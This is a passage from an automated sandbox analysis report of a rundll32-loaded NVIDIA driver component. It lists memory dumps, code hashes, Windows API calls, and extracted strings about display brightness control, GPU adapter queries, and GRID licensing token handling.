                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 24740636-0
                                                                    • Opcode ID: 718267e9826e8370e2889d1920cb342ac8506d4ba1e34d31712e09ab52e2dd6f
                                                                    • Instruction ID: c03f72745747746aa4ca6fed6c3797eb6542a2f8e0c1c2b6165de31e958d429d
                                                                    • Opcode Fuzzy Hash: 718267e9826e8370e2889d1920cb342ac8506d4ba1e34d31712e09ab52e2dd6f
                                                                    • Instruction Fuzzy Hash: CD41A231A1BA42A2EB289A24D4A537E6261EF447D0F440239DA7F437D5DF2CEC58C768
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 990200c829865227b6571aa3573083370787801c1570d2fe66e4a338792caab8
                                                                    • Instruction ID: e38d6c135564e5051a1db5a17ac7f48310b8c1a4206d0263a679fb2e44b4aae3
                                                                    • Opcode Fuzzy Hash: 990200c829865227b6571aa3573083370787801c1570d2fe66e4a338792caab8
                                                                    • Instruction Fuzzy Hash: 76A1D7302686485FF758AB29D455BEEB7D2FB88344F50452DF08AC32D2DF39D842978A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 59a31fbeb8a05151edb759329d96371e831f95528c315330fb92cc5f8aafcbf3
                                                                    • Instruction ID: 56e2502a16755275fdbf92e33e718c331ecd8984ea1885a1274d75f33fc10056
                                                                    • Opcode Fuzzy Hash: 59a31fbeb8a05151edb759329d96371e831f95528c315330fb92cc5f8aafcbf3
                                                                    • Instruction Fuzzy Hash: 8DB15F30628B044FE758EB2CD466B9EB7D2FBC8744F50462DB0CAD36D1CB79E9418686
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: 0
                                                                    • API String ID: 3215553584-4108050209
                                                                    • Opcode ID: 195b2cfd414302573d07b6318a124d7905505630c4cf68cee92227e9f8746074
                                                                    • Instruction ID: b03313c1b33f932a17dd6ec6f1f269ad223bbca1786801cd00181470a590026c
                                                                    • Opcode Fuzzy Hash: 195b2cfd414302573d07b6318a124d7905505630c4cf68cee92227e9f8746074
                                                                    • Instruction Fuzzy Hash: C87128A1A1A20362FB78AE3B41406B92691EF407C4F845431DF6E07699CF2DE84F972D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c77ee9db95c24773db9081a7deccb5cf2f36f3081fec3039551d8f54b381666b
                                                                    • Instruction ID: cf6950cfadc0a484f7f4069843dacffc98a3cfec29972e1e0726d5ebc2c3f580
                                                                    • Opcode Fuzzy Hash: c77ee9db95c24773db9081a7deccb5cf2f36f3081fec3039551d8f54b381666b
                                                                    • Instruction Fuzzy Hash: 2972B334B60A065FFB599B2A9C91FE933D6FB8C380F844474A84AC72C6DE34EC419659
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 350242b65a825236f0cef7dba7e89bea0ee836d7790e07bd0f8663bca9a95aae
                                                                    • Instruction ID: 5dbc976e77adda638d7a200b7e01795c21c1e5bab7433391d6523618e2aff616
                                                                    • Opcode Fuzzy Hash: 350242b65a825236f0cef7dba7e89bea0ee836d7790e07bd0f8663bca9a95aae
                                                                    • Instruction Fuzzy Hash: 4B727130158B088FE7A4EF19D885BDAB7E1FB98344F21466DD44DC72A6CB34E845CB86
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: aff5c4d20f6982611215f9d6a88c3eb7a971e3ecba982710c61e21332a3c11f9
                                                                    • Instruction ID: 5424bacf1d8f4a3963eeb9486640b34dca0ac75364863194d1d8b689baaf2864
                                                                    • Opcode Fuzzy Hash: aff5c4d20f6982611215f9d6a88c3eb7a971e3ecba982710c61e21332a3c11f9
                                                                    • Instruction Fuzzy Hash: E652B530368B045FF768BB199862BEEB3D6FBC8740F50451DA48AC32D2DA35E945C687
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: DeallocateProcessstd::_$CurrentInit_thread_footerTimesstd::invalid_argument::invalid_argument
                                                                    • String ID:
                                                                    • API String ID: 2931547792-0
                                                                    • Opcode ID: 35fd540647e9ab6b5c5af79c3890bb00567cf1995cf5ab655b5ad1e370cb5ff9
                                                                    • Instruction ID: f97fc17d90147405db273d4a89b83bc134d27c4a01291b853a0ef081e5b800ca
                                                                    • Opcode Fuzzy Hash: 35fd540647e9ab6b5c5af79c3890bb00567cf1995cf5ab655b5ad1e370cb5ff9
                                                                    • Instruction Fuzzy Hash: 8AD13672B06B06AAEB14DB64E4501EC3376FB48788B404536EE4E57B58EF3CD219C758
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 92dcddac20bf2a85382346e7c818b7a8622ac2cf6c43a00e52d6e282357d0b4a
                                                                    • Instruction ID: 5ccec3a933f4477f3bff263bf8337f2d30810f70192dcb4cdc1807c052b68d40
                                                                    • Opcode Fuzzy Hash: 92dcddac20bf2a85382346e7c818b7a8622ac2cf6c43a00e52d6e282357d0b4a
                                                                    • Instruction Fuzzy Hash: 7B81D43061C6488FF759DF1DD889BAAB7E1FB98744F10462DE48AC32E1DB70D8018786
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0402643845607bb60e6e3039bc907c849d41a449b6bebdaf36c0de0ce65c9838
                                                                    • Instruction ID: 021a4e8c9f311b664d250f45211b7a1e89dd299fbf7dce2736e958c08a0d6404
                                                                    • Opcode Fuzzy Hash: 0402643845607bb60e6e3039bc907c849d41a449b6bebdaf36c0de0ce65c9838
                                                                    • Instruction Fuzzy Hash: DE8194A4B6A34E53ECED057D290F13C81A7DB827C0EA4D036CD6D17BE9DE1C36089629
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a07fb626e085332546d45eb85ec56ea865a4a4cf460ba70e7ccd98f8023d075b
                                                                    • Instruction ID: b88839fe23b278e03ff549796cf06584b4896b36def47e46623429a9e742490d
                                                                    • Opcode Fuzzy Hash: a07fb626e085332546d45eb85ec56ea865a4a4cf460ba70e7ccd98f8023d075b
                                                                    • Instruction Fuzzy Hash: AF51DC72F26A9595EB50CBA998418BC2370FB187C4F118A35CE2D67B88EF3CE645C254
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9eb25984bbb84b506b7442a44f1ea2276f7130761b53bd599e6125853a15f57f
                                                                    • Instruction ID: 17b7f4e55ed803db92c04403a7e1809754ca34339932872c8e4ac4bcb4763ddc
                                                                    • Opcode Fuzzy Hash: 9eb25984bbb84b506b7442a44f1ea2276f7130761b53bd599e6125853a15f57f
                                                                    • Instruction Fuzzy Hash: AA4145301D8288BDF3684B1E8846BF93BC5E757B85F26522DC5D7832E2D931C80741C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 77c53f9c0189d6db76991bf2270a20501a0aee0ab20d4b3756397774943919d7
                                                                    • Instruction ID: 87871d6e1964c10a927f7c54f2cbfc90a48aa95a556f9c89372d4cafb9ba2e92
                                                                    • Opcode Fuzzy Hash: 77c53f9c0189d6db76991bf2270a20501a0aee0ab20d4b3756397774943919d7
                                                                    • Instruction Fuzzy Hash: 6E51DF22B15A85A5EB14EF2AE8403A92361FB04BECF405131EE2D47BD8DF78E519C314
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 485612231-0
                                                                    Similarity
                                                                    • API ID: ErrorLast$FreeLocal$FileModule$AttributesConditionHandleInfoMaskNameVerifyVersion
                                                                    • String ID: .dll$.sys$DriverSupportModules$DriverSupportModulesWow$OpenGLDriverName$OpenGLDriverNameWow$SOFTWARE\Khronos\OpenCL\Vendors$SOFTWARE\Khronos\Vulkan\Drivers$UserModeDListDriverName$UserModeDListDriverNameWow$UserModeDriverName$UserModeDriverNameWow
                                                                    • API String ID: 4251772004-68925701
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB5C6
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB5F6
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB62F
                                                                    • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB679
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB6AE
                                                                    • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB6E3
                                                                    • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB7D5
                                                                      • Part of subcall function 00007FF8A8CFC064: SetLastError.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC070
                                                                      • Part of subcall function 00007FF8A8CFC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC07A
                                                                      • Part of subcall function 00007FF8A8CFC064: LocalAlloc.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC08C
                                                                      • Part of subcall function 00007FF8A8CFC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC09F
                                                                      • Part of subcall function 00007FF8A8CFC064: LocalFree.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC0B0
                                                                      • Part of subcall function 00007FF8A8DC9BB8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DC9BD5
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB8AC
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB8B5
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB8BE
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8A8CFB8C7
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerSetConditionMask.KERNEL32 ref: 00007FF8A8CFABB0
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FF8A8CFABDE
                                                                    Similarity
                                                                    • API ID: Local$Free$Alloc$AddressProc$DirectorySystem$ConditionErrorInfoLastMaskVerifyVersion_invalid_parameter_noinfo
                                                                    • String ID: D3DKMTEnumAdapters2$D3DKMTEnumAdapters3$D3DKMTQueryAdapterInfo$NVDA$\SystemRoot\system32\$gdi32.dll
                                                                    • API String ID: 3214156114-2155789793
                                                                    Similarity
                                                                    • API ID: InitInit_thread_footerVariant
                                                                    • String ID: Interpolated dGPU brightness: $ACELOG: Current pwm brightness: $ACELOG: Failed to connect to WMI server, failed to init EC brightness$ACELOG: Failed to obtain the cycle length of PWM (%d)! Forcing 800 for now$ACELOG: failed to exec query Select * from WmiMonitorBrightnessMethods$Current OS Brightness : $CurrentBrightness$Nvidia::UXDriver::Core::WmiBrightnessControl::InitECBrightness$SELECT * FROM WmiMonitorBrightness$WQL$WmiBrightnessControl.cpp
                                                                    • API String ID: 3754537983-2271714606
                                                                    Similarity
                                                                    • API ID: swprintf$FileInit_thread_footerMutexObjectReleaseSingleSizeWait_invalid_parameter_noinfo
                                                                    • String ID: Failed to get file handle (%s)$Failed to open file %s (%s)$GridCloudLicensingTrustedStorage.cpp$H$Insufficient buffer size to read file$_readBinaryFile$rb+
                                                                    • API String ID: 3430759221-4049378212
                                                                    APIs
                                                                    • SetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFB91C
                                                                    • SetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBAC1
                                                                      • Part of subcall function 00007FF8A8CFB1E4: SetLastError.KERNEL32 ref: 00007FF8A8CFB229
                                                                      • Part of subcall function 00007FF8A8CFB1E4: GetModuleHandleW.KERNEL32 ref: 00007FF8A8CFB28F
                                                                      • Part of subcall function 00007FF8A8CFB1E4: GetModuleFileNameW.KERNEL32 ref: 00007FF8A8CFB2A8
                                                                      • Part of subcall function 00007FF8A8CFB1E4: GetFileAttributesW.KERNEL32 ref: 00007FF8A8CFB31E
                                                                      • Part of subcall function 00007FF8A8CFB1E4: LocalFree.KERNEL32 ref: 00007FF8A8CFB334
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFB9F3
                                                                      • Part of subcall function 00007FF8A8DC9BB8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DC9BD5
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA01
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA5C
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA6B
                                                                    • SetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA78
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA81
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA8C
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBA95
                                                                    • SetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBAB1
                                                                      • Part of subcall function 00007FF8A8CFC064: SetLastError.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC070
                                                                      • Part of subcall function 00007FF8A8CFC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC07A
                                                                      • Part of subcall function 00007FF8A8CFC064: LocalAlloc.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC08C
                                                                      • Part of subcall function 00007FF8A8CFC064: GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC09F
                                                                      • Part of subcall function 00007FF8A8CFC064: LocalFree.KERNEL32(?,?,00000000,00007FF8A8CFB851), ref: 00007FF8A8CFC0B0
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00007FF8A8CFACFB), ref: 00007FF8A8CFBAA4
                                                                    Similarity
                                                                    • API ID: ErrorLast$Local$Free$File$AttributesDirectoryModuleSystem$AllocHandleName_invalid_parameter_noinfo
                                                                    • String ID: \SystemRoot\system32\$system32\
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CreateDeallocateEventFromGuidsInstanceRegisterStringTracestd::_
                                                                    • String ID: APPID$Invalid serviceName received from container. Aborting...$NVSvc$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnInitialize$Plugin initialized successfully$Received OnInitialize() from NvContainer$Registering AppId for NvXDCoreModule$Registering server for NvXDCoreModule$service name from NvContainer is${C5EDFC9D-B018-41A4-9877-39AB18469C3A}
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Valuelstrcat
                                                                    • String ID: AuthToken$CacheAuthToken$Empty authentication token$NvXDCore.cpp$Reading authentication token$SOFTWARE\NVIDIA Corporation\Global\GridSW$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridSW$Unable to delete authentication token from registry$Unable to fetch authentication token from registry
                                                                    APIs
                                                                    • GetEnvironmentVariableA.KERNEL32(00000013,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D73E0D
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D73E80
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D73F71
                                                                    • GetLastError.KERNEL32(?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D74064
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D74080
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: swprintf$EnvironmentErrorLastVariable
                                                                    • String ID: Failed to get system drive path (%d)$GridCommonUtils.cpp$SystemDrive$Unable to fetch the client configuration token file$Unable to open directory (%s)$\Program Files\NVIDIA Corporation\vGPU Licensing\ClientConfigToken$isNLSTokenFilePresent
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle$Event$Create
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: swprintf$Init_thread_footerstrstr
                                                                    • String ID: "jti":"$"lease_list": {[$"system_clock_snapshot":"$GridCloudLicensingTrustedStorage.cpp$Malformed response - Could not find the expected tag$No content in local trusted store$cloudLicTSFetchParam
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$_invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
                                                                    • String ID: DefaultLogLevel$OriginRules
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
